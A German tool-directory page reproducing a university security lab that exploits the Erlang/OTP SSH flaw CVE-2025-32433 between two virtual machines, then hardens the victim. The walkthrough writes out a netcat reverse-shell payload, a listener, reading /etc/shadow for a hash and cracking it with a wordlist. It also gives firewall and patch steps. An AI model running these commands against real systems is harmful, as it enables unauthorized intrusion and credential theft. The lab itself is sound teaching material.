Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Exploiting-a-vulnerability-using-reverse-shell — Dieses Projekt simuliert ein realistisches Angriffs- und Verteidigungsszenario über zwei virtuelle Maschinen hinweg. Sie werden eine kritische Pre-Authentifizierungs-RCE-Schwachstelle (CVE-2025-32433) in einem Erlang/OTP SSH-Server ausnutzen, extrahierte Passwort-Hashes knacken und schließlich die Opfermaschine mit Firewall-Regeln und Patchen härten. | Kitploit
Tools/GitHubGitHub/dampedcoast/exploiting-a-vulnerability-using-reverse-shell
Passwort-CrackingSchwachstellenanalyseExploitationNetzwerksicherheitCTFPenetrationstestsLernen & BildungLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Dieses Projekt simuliert ein realistisches Angriffs- und Verteidigungsszenario über zwei virtuelle Maschinen hinweg. Sie werden eine kritische Pre-Authentifizierungs-RCE-Schwachstelle (CVE-2025-32433) in einem Erlang/OTP SSH-Server ausnutzen, extrahierte Passwort-Hashes knacken und schließlich die Opfermaschine mit Firewall-Regeln und Patchen härten.

GitHub
dampedcoast/exploiting-a-vulnerability-using-reverse-shell

Exploiting-a-vulnerability-using-reverse-shell

Repository anzeigen
5vor 2 MonatenNoch nicht geprüft
Teilen

Grundlagen der Informationssicherheit — Frühjahr 2026 Projekt

Gesamtpunkte: 20 | Abgabetermin: Keine verspäteten Abgaben akzeptiert

Überblick

Dieses Projekt simuliert ein reales Angriffs- und Verteidigungsszenario über zwei virtuelle Maschinen. Sie werden eine kritische Pre-Authentication RCE-Sicherheitslücke (CVE-2025-32433) in einem Erlang/OTP SSH-Server ausnutzen, extrahierte Passwort-Hashes knacken und dann die Opfermaschine mit Firewall-Regeln und Patches härten.

RolleBetriebssystem
AngreiferKali Linux
OpferUbuntu/Debian (Erlang/OTP SSH v27.3.2)

Dateien

DateiBeschreibung
Debian-1.ovaVorgefertigtes Opfer-VM-Image — separat herunterladen, siehe Ressourcen (zu groß für GitHub)

Ressourcen

  • Opfer-VM (Debian-1.ova): Download-Link — zu groß (~3 GB) für GitHub. Separat herunterladen und wie unten beschrieben in VirtualBox/VMware importieren.
  • Wortliste (rockyou_txt.txt): in diesem Repository enthalten, wird für den Passwort-Knack-Schritt in Teil 2 verwendet.

Setup

  1. VMs importieren — Debian-1.ova und Ihre Kali Linux VM in VirtualBox/VMware laden.
  2. Netzwerk — Beide VMs auf Host-Only Adapter stellen, damit sie privat kommunizieren können.
  3. Opfer-IP — Die Opfer-VM booten und ifconfig ausführen, um ihre IP zu finden (normalerweise in 192.168.56.0/24).

Teil 1 — Verwundbarer SSH-Server: Bereitstellung & Ausnutzung (10 Pkt.)

Aufklärung

root@kitploit:~
nmap -p 2222 -sV -A <Opfer-IP>

Offene Ports, Dienstversionen und Erlang-Signaturen dokumentieren.

CVE-2025-32433 ausnutzen (Pre-Auth RCE)

Kali vorübergehend auf NAT umstellen, um das Repo zu klonen, dann zurück zu Host-Only.

root@kitploit:~
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py

Das Skript bearbeiten — HOST = "<Opfer-IP>" setzen und den Payload aktualisieren:

root@kitploit:~
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'

Terminal 1 (Kali) — Listener starten:

root@kitploit:~
nc -lvnp 4444

Terminal 2 (Kali) — Exploit starten:

root@kitploit:~
python3 CVE-2025-32433.py

In der Reverse Shell whoami und hostname ausführen, um den Zugriff zu bestätigen.


Teil 2 — Post-Exploitation & Passwort-Knacken (5 Pkt.)

Hash extrahieren und knacken

root@kitploit:~
# Auf dem Opfer (via Reverse Shell)
cat /etc/shadow | grep testuser > hash.txt

# Auf Kali
john --wordlist=rockyou_txt.txt hash.txt

Das Hash-Format dokumentieren (z. B. $6$ = SHA-512), benötigte Zeit und das wiederhergestellte Klartext-Passwort.

Die Flagge finden

root@kitploit:~
find / -iname "flag.txt" 2>/dev/null
cat /pfad/zu/flag.txt

Teil 3 — Kontrollen & Behebung (5 Pkt.)

Den Angriffsvektor blockieren (iptables)

root@kitploit:~
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP

Den Nmap-Scan und den Exploit von Kali aus erneut ausführen — dokumentieren, dass Port 2222 jetzt "Filtered" ist und der Exploit fehlschlägt.

Die Schwachstelle patchen

Die Schritte dokumentieren, um Erlang/OTP auf v27.3.3 oder neuer zu aktualisieren, das den Fix für CVE-2025-32433 enthält.


Abzugebende Ergebnisse

  • Vollständiger Bericht mit Screenshots von: Scan, Exploit-Ausführung, Reverse Shell (whoami/hostname), Flaggen-Erfassung
  • Firewall-Vorher/Nachher-Dokumentation (Nmap-Ergebnisse mit Port-Status-Änderung)
  • Schriftliche Reflexion, die erklärt, warum Pre-Authentication RCEs deutlich gefährlicher sind als Post-Auth-Exploits

CVE-Referenz

CVE-2025-32433 — Kritische Pre-Authentication Remote Code Execution im Erlang/OTP SSH-Server. Ausnutzbar durch das Senden manipulierter SSH-Pakete vor jeglichem Credential-Austausch, wodurch ein nicht authentifizierter Angreifer vollen Shell-Zugriff erhält.

Tool herunterladen
Project Spring 2026 - Google Docs.pdfVollständige Projektanleitung mit abzugebenden Ergebnissen
rockyou_txt.txtWortliste, die mit John the Ripper zum Knacken des extrahierten Passwort-Hashes verwendet wird